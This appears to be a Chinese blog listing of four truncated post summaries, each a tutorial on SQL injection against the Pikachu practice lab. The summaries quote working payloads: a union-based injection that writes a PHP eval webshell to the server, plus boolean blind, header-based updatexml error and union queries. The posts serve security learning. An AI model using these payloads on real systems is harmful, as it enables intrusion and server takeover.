摘要:
在配置好服务器和数据库权限后,通过在服务器上传一句话木马达到控制服务器的目的,在pikachu中文本注入输入以下语句,php语言为一句话木马,后面为在服务器生成1.php的文件,另外一句为生成2.PHP文件 kobe' union select "<?php @eval($_GET['test']) 阅读全文
摘要:
一、布尔盲注: 对于经过处理过的程序,用上面这种方式往往无法获得想要的内容,此时可以通过盲注的方式来进行猜测。对于布尔盲注,需要一个一个猜测字符串的字符,下面的这个语句就是通过将p字母的阿斯克码转换后,判断这个字母是否等于112,以下通过这个语句的注入,就可以查询到相关的情况。 kobe' and 阅读全文
摘要:
在进行http请求的时候,可以对http的头部信息进行注入,通过burpsuite软件对http请求文件进行修改,修改内容如下: firefox' or updatexml(1,concat(0x7e,database()),0) or ' 在burpsuite中,将拦截到的http请求头部转换为上 阅读全文
摘要:
一、基于union函数的联合查询: 1.在数据库中通过union函数查询username和password等信息,如下 2.在pikachu中,通过字符型输入,通过union函数构建查询数据库名称和版本的语句: x' union select database(),version()# 二、基于报错 阅读全文